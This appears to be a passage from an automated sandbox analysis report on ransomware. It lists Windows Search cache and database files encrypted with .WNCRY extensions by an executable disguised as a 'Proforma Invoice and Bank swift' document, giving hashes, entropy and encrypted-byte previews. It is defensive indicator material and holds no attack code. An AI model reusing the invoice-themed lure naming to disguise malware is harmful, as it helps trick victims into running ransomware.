                                                          Preview:WANACRY!.....h..}^...{.../.....+.-J..7..MM...*......?...N..g;..^f.8..;...)W..F..@.....qw....ND...#K.:.l.zd.3B..._...`.D..s.n.`}.78...9=..n..m..MF.p*].!g.E.X.....B5...K...B..H.a>....H....-> .h....J.(^C.3..|.....q|<.[...W."...d.r3c.zB...S-..F.-.k....#Ka{..u......5.............y.....c.?.g.;.h..h.W*..e.t..6"M~...'........k\H.....E...|F.1y._PvP..B.4.R.ak.............O...M..jV(H.f..L...8.W..."b!.8.Q..t..*..&...T...".M.4.cg..0T..pe.s>.h.......&m..\..z)_.w...hBRh.......AV.7..X<O.8....r.}....m..0..V.I"?(+..o.:8........%-......V.vi......a0,......+.W.N..."......G..&..b.8.5....9...s].B..s..B"...3n.@e."......p...E,...1.C..#.......H.6....nw.'......5tal'.0.1...P.._......I.Iq...}.8O...6.#..)....... ..........._..r....`"...K..nV......g...4..!.}. h._..7.A.....9.......$.._....q.4......A.^...a..\&..$o.._..I=v.[.@..Fo'.S.|VZ..Sh?.0.......3.5.t.x.qG.g.l....c.....m......T_...O.s...q....V.#l...^k}xh....V.'.....L.~.$.!...&.YV...JE..yLGG.L..s...b1.Gc.p..Mz.gXy21*....a{)5..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\th[1].svg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):103448
                                                          Entropy (8bit):7.9982326499659235
                                                          Encrypted:true
                                                          SSDEEP:3072:+ANhnKHkpkHmqU3MPWgEfHWlOh3vHjfACuVd9MT3PgIPQC:FQkUBZOXfHWlOtvECuqjVYC
                                                          MD5:7CEFA73740FD581DBEC9630B2C83C75B
                                                          SHA1:807DE65C371A7072E6CB0E2044200F4815D280D8
                                                          SHA-256:3222621D67699D76B25DB663E50AC02CD26E2ABEF8E8ABBC86012CFA03BDBE49
                                                          SHA-512:1A2835D77A175BFED1CF04F5FD3FD1C3EF68F7A13B5FEF072E8D8C1E9E5CFBB437FD9ACE2D6879FE1ADF6F41DEF450F855FE22528B1C4B8B184DE9AD0C376CF4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....l...|.B.H....P$.4XD..........M........d.^.p....K..<....9a8ov.M.}..p..v.{*....p>p....#I....q..n....D8].@:.......k.#&.kx*.q0-.?...b.W.}.n.`.D.........WhA.u.9L..........K...ol.ua...Td&.:Z.m`..)_.J.....L./......w...1N./........*7g....)jh...Q............7.=\.[po:...C.?m==......-P...C..<.Y,.7<...;Z.Z..F.......x..R.IO6....}.....6Q..g.zt<Po. XYb^]hD...U........:L.#)...8..4.$K.\D.n.....y.y..U....gg..&....zh:....p...j..a.'......d..w...5<...O.....uq/G{....jr.%..)..<.F2.Zc-zcU=.*..[.u..Zw..!.......0h...Q.=.Q.G./wP.........>.P...C....Q..^.^m.s.*,Z".k.....2. .....g]4..#..[...S...G...&..k...;Q.U..}.........l..x.j..y.....0c..........`...X..Xr.../y7]..BG......x..RoB...E.a..]....1...?2...~..HD.6.u0-a.h..=....q%..J.9..0..#..?....+.w../..q.j.d'UJ.aK.1..K*.h&..}6DJe...z)...L/.W......W,..Z#|...-......'..h.N..RG..^h...c.'.s.=8...xF.....\.+.;.&..E./\..X.|<..)~......5-n...G(n1......0..5..=a.Zj. X.F...9....7..>..L7v|O$.:f...z....=.s.|....0

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\th[1].svg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):103448
                                                          Entropy (8bit):7.9982326499659235
                                                          Encrypted:true
                                                          SSDEEP:3072:+ANhnKHkpkHmqU3MPWgEfHWlOh3vHjfACuVd9MT3PgIPQC:FQkUBZOXfHWlOtvECuqjVYC
                                                          MD5:7CEFA73740FD581DBEC9630B2C83C75B
                                                          SHA1:807DE65C371A7072E6CB0E2044200F4815D280D8
                                                          SHA-256:3222621D67699D76B25DB663E50AC02CD26E2ABEF8E8ABBC86012CFA03BDBE49
                                                          SHA-512:1A2835D77A175BFED1CF04F5FD3FD1C3EF68F7A13B5FEF072E8D8C1E9E5CFBB437FD9ACE2D6879FE1ADF6F41DEF450F855FE22528B1C4B8B184DE9AD0C376CF4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....l...|.B.H....P$.4XD..........M........d.^.p....K..<....9a8ov.M.}..p..v.{*....p>p....#I....q..n....D8].@:.......k.#&.kx*.q0-.?...b.W.}.n.`.D.........WhA.u.9L..........K...ol.ua...Td&.:Z.m`..)_.J.....L./......w...1N./........*7g....)jh...Q............7.=\.[po:...C.?m==......-P...C..<.Y,.7<...;Z.Z..F.......x..R.IO6....}.....6Q..g.zt<Po. XYb^]hD...U........:L.#)...8..4.$K.\D.n.....y.y..U....gg..&....zh:....p...j..a.'......d..w...5<...O.....uq/G{....jr.%..)..<.F2.Zc-zcU=.*..[.u..Zw..!.......0h...Q.=.Q.G./wP.........>.P...C....Q..^.^m.s.*,Z".k.....2. .....g]4..#..[...S...G...&..k...;Q.U..}.........l..x.j..y.....0c..........`...X..Xr.../y7]..BG......x..RoB...E.a..]....1...?2...~..HD.6.u0-a.h..=....q%..J.9..0..#..?....+.w../..q.j.d'UJ.aK.1..K*.h&..}6DJe...z)...L/.W......W,..Z#|...-......'..h.N..RG..^h...c.'.s.=8...xF.....\.+.;.&..E./\..X.|<..)~......5-n...G(n1......0..5..=a.Zj. X.F...9....7..>..L7v|O$.:f...z....=.s.|....0

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\th[2].png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24104
                                                          Entropy (8bit):7.992340761609319
                                                          Encrypted:true
                                                          SSDEEP:384:fGqpf9Wib5O/MWai09T1eG7/WU7+O6ddRjYq9PFlz653jGSCVkmiIyJ:fGqpf9/8/Mvi0fN7+O6l79lE3LUZTyJ
                                                          MD5:23FC1FD62BC7F73BF1B0E52D07256472
                                                          SHA1:118482726F2A7839B3DA9B8208F565FB843C9FA9
                                                          SHA-256:013AB0B2E5A66A7F389668CD989088A85C91A2FD4787B7935588714B3E5652D9
                                                          SHA-512:9F6079838A9160FF5E3AF32946CF5B113F527A92C3C0C9A54A710F452CB55D48377F7B53F45D40D3FA75F6152734CB44EBBC5941AAD3CA61B559DAC04A402938
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......xj.(......%(.w.p...;.....E...7.....?....K...7.....?`R4.>.....G...cw.........e.V....[..v.Y..Xl..7.>'em.P..N..m.RC.....dX?=.....4T.w;_...F.vK..G.O.L.!...4ZF.xc]y.G...[).i.e.1s.......u.s..Z....U.U:I?.h&...P.%......}..dR>y.3I.....DqV..V9o...?......]......}.s..b)..)...u&"{.mu]}.. ....So.3N...y.%....w{T...u..x.@........B.h........2..X.Xe......,.. h......s6{==+.d..[.2....aA...Rq...f.^.<.K.s..EB...t....c.k..P8b3......;.i|H..Gr........0Oi.t.q(;.....^.&....J.e4..........<s.H`.$N. G.u.R.s......c..."/..I...)G.|t..s..`.py".94.+B.*.&....ivH.v|g...x..{.{..\...H.!t.:..T.h.....{.Z,,z..k...r....3 >.l.y...TR.;gT?..MvGC..#d.m......L?....|.^}.....|..6....|k.n.my.p.~.UX.KU.g.h~..XNk............<B.q.L.^.,P.Q...C....l+....r.C...J...4.I..Z.X....>E.V.h%...j6..L#%c..l..dZ.#.Gi..gj....lTj9.3.9...XL.K.L.+.Y.>.t...Q..QE.....#eWU..9.o..4.Y.4....R..oQ.+.k{.ZW...T1...i!*.....f.............oh...w...3..F.A]p.u.ZY..,....P*.Tj2.....G..[..G......&.S.).

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\th[2].png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24104
                                                          Entropy (8bit):7.992340761609319
                                                          Encrypted:true
                                                          SSDEEP:384:fGqpf9Wib5O/MWai09T1eG7/WU7+O6ddRjYq9PFlz653jGSCVkmiIyJ:fGqpf9/8/Mvi0fN7+O6l79lE3LUZTyJ
                                                          MD5:23FC1FD62BC7F73BF1B0E52D07256472
                                                          SHA1:118482726F2A7839B3DA9B8208F565FB843C9FA9
                                                          SHA-256:013AB0B2E5A66A7F389668CD989088A85C91A2FD4787B7935588714B3E5652D9
                                                          SHA-512:9F6079838A9160FF5E3AF32946CF5B113F527A92C3C0C9A54A710F452CB55D48377F7B53F45D40D3FA75F6152734CB44EBBC5941AAD3CA61B559DAC04A402938
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......xj.(......%(.w.p...;.....E...7.....?....K...7.....?`R4.>.....G...cw.........e.V....[..v.Y..Xl..7.>'em.P..N..m.RC.....dX?=.....4T.w;_...F.vK..G.O.L.!...4ZF.xc]y.G...[).i.e.1s.......u.s..Z....U.U:I?.h&...P.%......}..dR>y.3I.....DqV..V9o...?......]......}.s..b)..)...u&"{.mu]}.. ....So.3N...y.%....w{T...u..x.@........B.h........2..X.Xe......,.. h......s6{==+.d..[.2....aA...Rq...f.^.<.K.s..EB...t....c.k..P8b3......;.i|H..Gr........0Oi.t.q(;.....^.&....J.e4..........<s.H`.$N. G.u.R.s......c..."/..I...)G.|t..s..`.py".94.+B.*.&....ivH.v|g...x..{.{..\...H.!t.:..T.h.....{.Z,,z..k...r....3 >.l.y...TR.;gT?..MvGC..#d.m......L?....|.^}.....|..6....|k.n.my.p.~.UX.KU.g.h~..XNk............<B.q.L.^.,P.Q...C....l+....r.C...J...4.I..Z.X....>E.V.h%...j6..L#%c..l..dZ.#.Gi..gj....lTj9.3.9...XL.K.L.+.Y.>.t...Q..QE.....#eWU..9.o..4.Y.4....R..oQ.+.k{.ZW...T1...i!*.....f.............oh...w...3..F.A]p.u.ZY..,....P*.Tj2.....G..[..G......&.S.).

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\trans[1].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.276255109927344
                                                          Encrypted:false
                                                          SSDEEP:6:bkEt2SlHuGV4GTR8ozXmTIfAakkTtS/qxOi1Us7+kgGqEPF3t4bkS1OtkO:bkEkSkGVHTRpzXmTa8kTtS/qpg/Et3K+
                                                          MD5:762DDB59EDB8C8AE063C171A0281F51B
                                                          SHA1:96DA47812361488A4B6DD2768957CFB1A45D489B
                                                          SHA-256:B6E23A634DEE22534683B7359F54CB35BFCB74A7D54F187856F0824E58E556F1
                                                          SHA-512:DA223F13AAEBAE2E9691699BF052FED818A5940B9D8EB6CD1891D4FEC12DFB7D684FC86493FA5D848C6E9AACB5D722402DB22A1AB9D8148971BA7039A6FE8E04
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Y$.._..Q...'.0... ...c..w<...IS...r._w..vx2{.fk.((<.%|H...C....?Py...BT.....2.|jk.,2.....4.M..yx....[9....y..].m.W..J..Z.........+...J......Y....)...q...-..z:..3..!..r.......a.8.j=A...Y$*......[h......H.D.6.......a.F.A.>...s.T#..q..5hR..&.@yK.....+.......W..e.I..i.>(.e.J../.........?..f.0......et.P<w

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\trans[1].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.276255109927344
                                                          Encrypted:false
                                                          SSDEEP:6:bkEt2SlHuGV4GTR8ozXmTIfAakkTtS/qxOi1Us7+kgGqEPF3t4bkS1OtkO:bkEkSkGVHTRpzXmTa8kTtS/qpg/Et3K+
                                                          MD5:762DDB59EDB8C8AE063C171A0281F51B
                                                          SHA1:96DA47812361488A4B6DD2768957CFB1A45D489B
                                                          SHA-256:B6E23A634DEE22534683B7359F54CB35BFCB74A7D54F187856F0824E58E556F1
                                                          SHA-512:DA223F13AAEBAE2E9691699BF052FED818A5940B9D8EB6CD1891D4FEC12DFB7D684FC86493FA5D848C6E9AACB5D722402DB22A1AB9D8148971BA7039A6FE8E04
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Y$.._..Q...'.0... ...c..w<...IS...r._w..vx2{.fk.((<.%|H...C....?Py...BT.....2.|jk.,2.....4.M..yx....[9....y..].m.W..J..Z.........+...J......Y....)...q...-..z:..3..!..r.......a.8.j=A...Y$*......[h......H.D.6.......a.F.A.>...s.T#..q..5hR..&.@yK.....+.......W..e.I..i.>(.e.J../.........?..f.0......et.P<w

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\trans[2].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.191832093003917
                                                          Encrypted:false
                                                          SSDEEP:6:bkEUOhstQpTz8U4rWKMF699ALnQrQxk6hcrGo/UEZyNmIKGzSck8+mgcBeY:bkEUOhswXKraQPC+Qxk6erGo/UOehKhS
                                                          MD5:6F90BCB027F5796DAA7132DA36D46CD6
                                                          SHA1:CA802578FEB029FEF34925CFFD7A917D4B7233DF
                                                          SHA-256:0C6F929840E50B8D1B687283F6F651733F755737D9515806E443A51BA3D90003
                                                          SHA-512:6751B92DA72AB181DC9F3C7ACF3B483CBF9E1F75ABA31140211A9401DDD7AB1E58EF5C548E79B98337E5FFABD710E44F403FD0609FB8C2EA7EEF4D2E4D8809FD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........D..3'...I\.C......`...~.'i*..P....T2......'...gVK 7N.Y.}90.s.Bu.>:.:?.5..A'.)q ...q}.yrm...<..M2..............zT..-.*E..GV.N.....N..ST...S.........}....... .#.......u.' =.. ...?}8D3d...G..(...>V{./.=...^........K[..?.g.Gv...|...l.n....6H.D....+.......)..*...qU.L3#...4.N-P|._.! ..`e^C3N.i.YX....Q.\.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\trans[2].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.191832093003917
                                                          Encrypted:false
                                                          SSDEEP:6:bkEUOhstQpTz8U4rWKMF699ALnQrQxk6hcrGo/UEZyNmIKGzSck8+mgcBeY:bkEUOhswXKraQPC+Qxk6erGo/UOehKhS
                                                          MD5:6F90BCB027F5796DAA7132DA36D46CD6
                                                          SHA1:CA802578FEB029FEF34925CFFD7A917D4B7233DF
                                                          SHA-256:0C6F929840E50B8D1B687283F6F651733F755737D9515806E443A51BA3D90003
                                                          SHA-512:6751B92DA72AB181DC9F3C7ACF3B483CBF9E1F75ABA31140211A9401DDD7AB1E58EF5C548E79B98337E5FFABD710E44F403FD0609FB8C2EA7EEF4D2E4D8809FD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........D..3'...I\.C......`...~.'i*..P....T2......'...gVK 7N.Y.}90.s.Bu.>:.:?.5..A'.)q ...q}.yrm...<..M2..............zT..-.*E..GV.N.....N..ST...S.........}....... .#.......u.' =.. ...?}8D3d...G..(...>V{./.=...^........K[..?.g.Gv...|...l.n....6H.D....+.......)..*...qU.L3#...4.N-P|._.! ..`e^C3N.i.YX....Q.\.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\trans[3].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.263715067432053
                                                          Encrypted:false
                                                          SSDEEP:6:bkEuqCmVIzTibWTH+/q0rEmMZ5biXN7SF3HTOUXdYnMfun:bkE4mVciqL+/JILu1ShHTOUNWn
                                                          MD5:EE29DE28731D4E9385AE4E8E9A12083C
                                                          SHA1:B256F898E0548C373B82B09FEFDCE2D168D21BDC
                                                          SHA-256:5C6F1C38F9DDD35985F38156244468148E49E7F3767559EA12E00B5C01096323
                                                          SHA-512:42F60E171CC82E4D4A083890B9E8F4B958255C1A24260653459131E245C0292DEB4B70D88DD14B030C90B01CB4D3254FCEB093921A56B66BED060CD739EC1B55
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....R..?.24.,p.....N.....n*,..u...M.....).d.q>r_..p.....%.."V..{=.X....a...-.,..7...u..&.U...o..8wR.....cl.....W.k.o...o..b.8..F.I.d......>'.,.=.......Z+...T6.*.2.....~O..--..x.Y.........M..c..L...8..{j.....z...........).M.2]7....C&t..U'e..`zK....+...........4'B!.."...."..,V.^g......h...&e)A.~..@.}.!.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\trans[3].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.263715067432053
                                                          Encrypted:false
                                                          SSDEEP:6:bkEuqCmVIzTibWTH+/q0rEmMZ5biXN7SF3HTOUXdYnMfun:bkE4mVciqL+/JILu1ShHTOUNWn
                                                          MD5:EE29DE28731D4E9385AE4E8E9A12083C
                                                          SHA1:B256F898E0548C373B82B09FEFDCE2D168D21BDC
                                                          SHA-256:5C6F1C38F9DDD35985F38156244468148E49E7F3767559EA12E00B5C01096323
                                                          SHA-512:42F60E171CC82E4D4A083890B9E8F4B958255C1A24260653459131E245C0292DEB4B70D88DD14B030C90B01CB4D3254FCEB093921A56B66BED060CD739EC1B55
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....R..?.24.,p.....N.....n*,..u...M.....).d.q>r_..p.....%.."V..{=.X....a...-.,..7...u..&.U...o..8wR.....cl.....W.k.o...o..b.8..F.I.d......>'.,.=.......Z+...T6.*.2.....~O..--..x.Y.........M..c..L...8..{j.....z...........).M.2]7....C&t..U'e..`zK....+...........4'B!.."...."..,V.^g......h...&e)A.~..@.}.!.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\y1DovzXWmZOic4QXLXu-qBKEMRM.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):70296
                                                          Entropy (8bit):7.997334638188674
                                                          Encrypted:true
                                                          SSDEEP:1536:wErGyweNefdAXdEFg+vSIOtJ4p1D6iWMS6Zhnkzz3yIH:wuNefdcdCgeSrJi1WRl6Zhknyq
                                                          MD5:BEA3DB6B1F2212643A631F3883D16976
                                                          SHA1:1D0E260E68D94B73A51CABA26372109B7F7DFF85
                                                          SHA-256:1990A396E85661835B040C7B3071679FFCFD549ACCE6C1FA34EF0EB5882C11D4
                                                          SHA-512:E92CDBDF251795FD4B86BF7799DA66D042745FA3DB5B34E7AD4C45AA761FFF1F2383F4F2F222CB3EA98EFC01B669EFFAE6A9A3F3A5034AE14D80F67340399686
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Q..#......i*Q...F]C.2q.1c.:lQ.E...cEqI..yV.O..?...I..L.....3.0.L........t.....|.?......=..Oy.~.q.W.v........Wx..6.POXQ.k....FV..8......(l_..v.j.p......e.U........CS"a.i.CDP\.....D.(.....s.4..3p...[...X.s.Vj>......P.......&.F9....IB).>N.9....w........N.....^.[....R..G..f..G.`.lJ.=.g.t...N..0..HJ..U...c..0.d.peTu...u....b.4A..z......_Y...,.K...x1.8....BN.....z..S.~.1.2...J[..GDm...F.CN5.|.}......'b&.k..g....Dh....})w..0h..K..*..g6.e..~g........W..W.<u./YW........7}..3..q&TMe.U..c.....8aI.`I..z.}.JK.N+9.#..".e.0.-.uEY.V.b..).0U.M...+.....[..&....AzK"{..N....f./.$.a<.3..[..'.[.kR....4..=....R..`.oq5.m...r...@.*...b...... X..... z...A...d.;>..kU(.....t0...vQ..s.r.....l....w.e:....D.._r.......3 .Y...+..Zou......0n.e..Q.....m..^..,".D..e...b.....'.r...#....T...0....y..n..#J..+.@sC.y....L....l..D...,C+.....a..S.u..PEZ..\'.|>..C....f+V.0.OH...yO..ZC.iZ.K.\$....16..+.9.B.}.....P.L...Gb.&.).zS5....9.. .w..r.....;.8....49.U..3...1.....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\y1DovzXWmZOic4QXLXu-qBKEMRM.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):70296
                                                          Entropy (8bit):7.997334638188674
                                                          Encrypted:true
                                                          SSDEEP:1536:wErGyweNefdAXdEFg+vSIOtJ4p1D6iWMS6Zhnkzz3yIH:wuNefdcdCgeSrJi1WRl6Zhknyq
                                                          MD5:BEA3DB6B1F2212643A631F3883D16976
                                                          SHA1:1D0E260E68D94B73A51CABA26372109B7F7DFF85
                                                          SHA-256:1990A396E85661835B040C7B3071679FFCFD549ACCE6C1FA34EF0EB5882C11D4
                                                          SHA-512:E92CDBDF251795FD4B86BF7799DA66D042745FA3DB5B34E7AD4C45AA761FFF1F2383F4F2F222CB3EA98EFC01B669EFFAE6A9A3F3A5034AE14D80F67340399686
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Q..#......i*Q...F]C.2q.1c.:lQ.E...cEqI..yV.O..?...I..L.....3.0.L........t.....|.?......=..Oy.~.q.W.v........Wx..6.POXQ.k....FV..8......(l_..v.j.p......e.U........CS"a.i.CDP\.....D.(.....s.4..3p...[...X.s.Vj>......P.......&.F9....IB).>N.9....w........N.....^.[....R..G..f..G.`.lJ.=.g.t...N..0..HJ..U...c..0.d.peTu...u....b.4A..z......_Y...,.K...x1.8....BN.....z..S.~.1.2...J[..GDm...F.CN5.|.}......'b&.k..g....Dh....})w..0h..K..*..g6.e..~g........W..W.<u./YW........7}..3..q&TMe.U..c.....8aI.`I..z.}.JK.N+9.#..".e.0.-.uEY.V.b..).0U.M...+.....[..&....AzK"{..N....f./.$.a<.3..[..'.[.kR....4..=....R..`.oq5.m...r...@.*...b...... X..... z...A...d.;>..kU(.....t0...vQ..s.r.....l....w.e:....D.._r.......3 .Y...+..Zou......0n.e..Q.....m..^..,".D..e...b.....'.r...#....T...0....y..n..#J..+.@sC.y....L....l..D...,C+.....a..S.u..PEZ..\'.|>..C....f+V.0.OH...yO..ZC.iZ.K.\$....16..+.9.B.}.....P.L...Gb.&.).zS5....9.. .w..r.....;.8....49.U..3...1.....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1573144
                                                          Entropy (8bit):7.999897354332129
                                                          Encrypted:true
                                                          SSDEEP:24576:zCBIw3sFgFLCg1n/ZsqJ3kyvwgiOTwSuFrzygcyoDtEzbCMZGtJ7Ew7CaXeHcTXT:Q7SAmolOMEpegBoZQZz3aXe8xVhALC
                                                          MD5:3DA3BFEAF3D65F43A71AC800408B7C6A
                                                          SHA1:0DF262408AFD711832D4AC3B5DE7C82B31B896DA
                                                          SHA-256:10B101362E286A13EFC12E5627D6EB17D3ACF4A9C5035B81A13D1068588813D8
                                                          SHA-512:50A0D38BD518699ABB2F5C4B36A8B0A33949FB82197A9C95C98E15B2CC84B418DA6D6F4037A4BB9EC915700C41E2D3555AFDC49C73D44748431CA66E25FA69B4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......]P.L.. /U."..n...#39}....i..:.....'.q.PU.4..++.....J^.q'.>.5.%..K.H..W...n....G.i=.Hi.R.s..@.$i\.]fh'...e`vL.0..B......S..9.v!..Y>.0...`?.u..F..J..n8a..!...N9D-ihaJ....../#..I|1.q..1....9.1.....z.)al<..J.s`._Ah==t..`n..S...L...U./PM._.W.2.c.?.O.............0..../..;8./...3..$m.'3l..X.t./.D....W_.e.}#.I).-.(9.R+<|..#|..ZZ.g.n.}q.dDn..E9.V.}`..~...Ll."......!sfS...1kb...h](.u..*q......^..H..?X...n.......,..........t...g%R..,...j...u...2.Z.....4l.....\.2.&S.J.@h-......'..z:....t.D.m.<...g........L...m5.f-..[.<...Y.t.\.>.hF....e...H*(..s...../-1=.?:.K9.^....}.._u....Q.Z......v.^..h|.~~....8....S.d.x.?......?fOV.@u9o.'y...L..7q.H...p...M.j..B{1.%.dI..F[wUbrR|u.!..+.R.?.*.Xg.t.....#...E......zGq..YR"..P.%.-.B.n..WHn[....;..7^u...h....{ .G.[@.E..F.Q....P..S..........)...[p.J...3G..V......U7...MOt.u_*p...l.=;|...l.....*#..(..o....{u..FV...g&.......i..x..e.......g.. .t..}..S....0...n.........l.*R...4`X>..q[.Q[....8.#.._....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1573144
                                                          Entropy (8bit):7.999897354332129
                                                          Encrypted:true
                                                          SSDEEP:24576:zCBIw3sFgFLCg1n/ZsqJ3kyvwgiOTwSuFrzygcyoDtEzbCMZGtJ7Ew7CaXeHcTXT:Q7SAmolOMEpegBoZQZz3aXe8xVhALC
                                                          MD5:3DA3BFEAF3D65F43A71AC800408B7C6A
                                                          SHA1:0DF262408AFD711832D4AC3B5DE7C82B31B896DA
                                                          SHA-256:10B101362E286A13EFC12E5627D6EB17D3ACF4A9C5035B81A13D1068588813D8
                                                          SHA-512:50A0D38BD518699ABB2F5C4B36A8B0A33949FB82197A9C95C98E15B2CC84B418DA6D6F4037A4BB9EC915700C41E2D3555AFDC49C73D44748431CA66E25FA69B4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......]P.L.. /U."..n...#39}....i..:.....'.q.PU.4..++.....J^.q'.>.5.%..K.H..W...n....G.i=.Hi.R.s..@.$i\.]fh'...e`vL.0..B......S..9.v!..Y>.0...`?.u..F..J..n8a..!...N9D-ihaJ....../#..I|1.q..1....9.1.....z.)al<..J.s`._Ah==t..`n..S...L...U./PM._.W.2.c.?.O.............0..../..;8./...3..$m.'3l..X.t./.D....W_.e.}#.I).-.(9.R+<|..#|..ZZ.g.n.}q.dDn..E9.V.}`..~...Ll."......!sfS...1kb...h](.u..*q......^..H..?X...n.......,..........t...g%R..,...j...u...2.Z.....4l.....\.2.&S.J.@h-......'..z:....t.D.m.<...g........L...m5.f-..[.<...Y.t.\.>.hF....e...H*(..s...../-1=.?:.K9.^....}.._u....Q.Z......v.^..h|.~~....8....S.d.x.?......?fOV.@u9o.'y...L..7q.H...p...M.j..B{1.%.dI..F[wUbrR|u.!..+.R.?.*.Xg.t.....#...E......zGq..YR"..P.%.-.B.n..WHn[....;..7^u...h....{ .G.[@.E..F.Q....P..S..........)...[p.J...3G..V......U7...MOt.u_*p...l.=;|...l.....*#..(..o....{u..FV...g&.......i..x..e.......g.. .t..}..S....0...n.........l.*R...4`X>..q[.Q[....8.#.._....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2097432
                                                          Entropy (8bit):7.999904518981081
                                                          Encrypted:true
                                                          SSDEEP:49152:hmcI6hWlqaFrpRU4zg3G40dBCNu1VwTAI7zv/iS5NHIaQFxsqDuvwmjSPZ:hj0lqSRUB370m41VwVD//5GaQLsux
                                                          MD5:EACA3463526540A51B643E4A1CFC4B51
                                                          SHA1:4211C9BB3CC9CA950A26FF4C7DC6766B3BC97380
